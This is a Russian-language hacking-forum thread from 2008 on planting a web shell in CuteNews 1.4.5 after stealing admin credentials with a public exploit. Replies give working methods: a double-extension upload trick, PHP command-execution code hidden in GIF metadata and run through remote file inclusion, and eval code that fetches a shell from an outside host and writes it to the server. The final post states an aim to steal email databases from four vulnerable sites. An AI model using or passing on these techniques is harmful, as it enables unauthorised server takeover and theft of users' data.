01.04.2008, 02:13
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
CuteNews 1.4.5 help
Здраствуйте товарисчи !
С толкнулся с такой проблемой. Пробежавшись по сайтам нашел сплойт на 1,4,5 выдернул акк и пароль на админку, проверил - входит.
Опять полез по просторам искать возможность залить шел на сервак- в итоге попал сюда =) ибо не че путного не нашел.
Хотел спросить знающих, какие способы есть заливки шела имея админа в 1,4,5 ? (Желательно если такое возможно с пояснениями)
И сразу же не отходя ещё вопрос по шелу- есть шел с функциями удаления файлов на удаленной машине, открытие cmd?
З.Ы. Убедительная просьба не отправлять на поиск т.к. там все не то что надо, либо для cutenews расписано в 2 строчки что приводик к замешательству...
|
|
|
01.04.2008, 22:15
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
Там можно залить картинку в виде 123.jpg.php а также евалить код в шаблонах. как сделать второе - догадайся сам.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
02.04.2008, 02:28
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Про 1:
а можно поподробней про 123.jpg.php . (попробовал залить через админку пишет такой тип файлов не поддерживается)
2:
Я пробывал вставлять на прямую пхп код, но он не выводит его... тоесть вообще не воспринимает.
а по поводу евалить ? - оно ?
<?php eval(GET['путь до шела/shell.php']) ?> - тоесть с помощью этой строчки загрузиться мой шелл ?
Последний раз редактировалось 6u4yxa; 02.04.2008 в 03:28..
|
|
|
|
02.04.2008, 11:43
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
нашел на секьюритилаб
Необходимый уровень доступа: => 3 (journalist)
# SHELL #
[1] Открываем фотошоп, создаем картинку 60х60. Идем в File -> File Info и пишем в поле копирайтов: Код <?php passthru($_GET['cmd']); include($_GET['sh']); ?> Сохраняем картинку с именем image.gif
[2] Постим новость. Вводим все необходимые поля и жмем на ссылку [insert image]. Жмем на кнопку Обзор и выбираем наш image.gif. Жмем на upload. Если все прошло успешно, видим сообщение: "image.jpg -> Image was uploaded". Жмем на ссылку [insert it]. Жмем Add News. Наш image.gif расположен здесь: http://host/[news]/data/upimages/image.gif
[3] Получаем шелл. Регистрируем домен на хостинге с поддержкой PHP и allow_url_fopen = on (у нас будет http://host.ru). создаем файл (допустим inc.php) со следующим содержанием:
Теперь запускаем его так: http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&cmd=ls -la
или так:
http://host.ru/inc.php?shell=http://host/[news]/data/upimages/image.gif&sh=http://shell Прошелся 100 раз по всем трем пунктам =) результата 0 =) хостер (в локалке сервак) выдает:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\appserv\htdocs\inc.php on line 1
Warning: include(http://ip(там где картинка)/cute/data/upimages/image.gif) [function.include]: failed to open stream: no suitable wrapper could be found in C:\appserv\htdocs\inc.php on line 1
Warning: include() [function.include]: Failed opening 'http://ip(там где картинка)/cute/data/upimages/image.gif' for inclusion (include_path='.;C:\appserv\php\pear\') in C:\appserv\htdocs\inc.php on line 1
З.Ы. в пхп.ини include = on fopen = on |
|
|
|
02.04.2008, 11:53
|
|
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
С нами:
9596486
Репутация:
291
|
|
URL file-access is disabled in the server configuration
попроси админа сделать URL file-access enabled. то что include=on и fopen=on не имеет значения. тебе сказано в чем проблема
|
|
|
|
02.04.2008, 13:08
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Сообщение от zythar
попроси админа сделать URL file-access enabled. то что include=on и fopen=on не имеет значения. тебе сказано в чем проблема
C URL file-access enabled - меня побрили без указания причин =)
Есть какие нить варианты, как залить шелл имея админку в cutenews ?
|
|
|
|
02.04.2008, 12:51
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
пробуй eval'ить код
PHP код:
$data=@implode('',file('http://toxa.nov.ru/z.txt'));
$fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp);
или просто форму для загрузки сделай и через неё грузи шелл
__________________
Последний раз редактировалось +toxa+; 02.04.2008 в 12:54..
|
|
|
|
02.04.2008, 13:18
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
С нами:
9729413
Репутация:
5
|
|
Сообщение от +toxa+
пробуй eval'ить код
PHP код:
$data=@implode('',file('http://toxa.nov.ru/z.txt'));
$fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp);
или просто форму для загрузки сделай и через неё грузи шелл Когда через админку вставляю в темплейты любой пхп код, то он не как не всопринимается.
|
|
|
|
29.05.2008, 14:46
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами:
10061666
Репутация:
2438
|
|
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");
[...]
for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
$current_image = 'image_'.$image_i;
$image = $_FILES[$current_image]['tmp_name'];
$image_name = $_FILES[$current_image]['name'];
$image_name = str_replace(" ", "_", $image_name);
$img_name_arr = explode(".",$image_name);
$type = end($img_name_arr);
if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
$img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
}
else{ //Image is OK, upload it
|
|
|
|
12.08.2008, 08:24
|
|
Новичок
Регистрация: 27.05.2008
Сообщений: 5
С нами:
9451017
Репутация:
2
|
|
тему АП 
Сообщение от baltazar
с картинками там проблема,вот взял и передал сплоит что на милворме,вот что получилось
Код:
$allowed_extensions = array("gif", "jpg", "png", "bmp", "jpe", "jpeg");
[...]
for ($image_i = 1; $image_i < ($images_number+1); $image_i++) {
$current_image = 'image_'.$image_i;
$image = $_FILES[$current_image]['tmp_name'];
$image_name = $_FILES[$current_image]['name'];
$image_name = str_replace(" ", "_", $image_name);
$img_name_arr = explode(".",$image_name);
$type = end($img_name_arr);
if($image_name == ""){ $img_result .= "<br><font color=red>$current_image -> No File Specified For Upload!</font>"; }
elseif( !isset($overwrite) and file_exists($config_path_image_upload."/".$image_name)){ $img_result .= "<br><font color=red>$image_name -> Image already exist!</font>";}
elseif( !(in_array($type, $allowed_extensions) or in_array(strtolower($type), $allowed_extensions)) ){
$img_result .= "<br><font color=red>$image_name ->This type of file is not allowed !!!</font>";
}
else{ //Image is OK, upload it
хм... спойт как я понимаю этот: http://milw0rm.com/exploits/4779
куда ты там свою переделку запихал???
p.s. в наличии 4 сайта с такойже проблемой.... хочется стянуть базу мыл... |
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
CuteNews
|
ZweR |
PHP |
2 |
08.02.2008 14:22 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
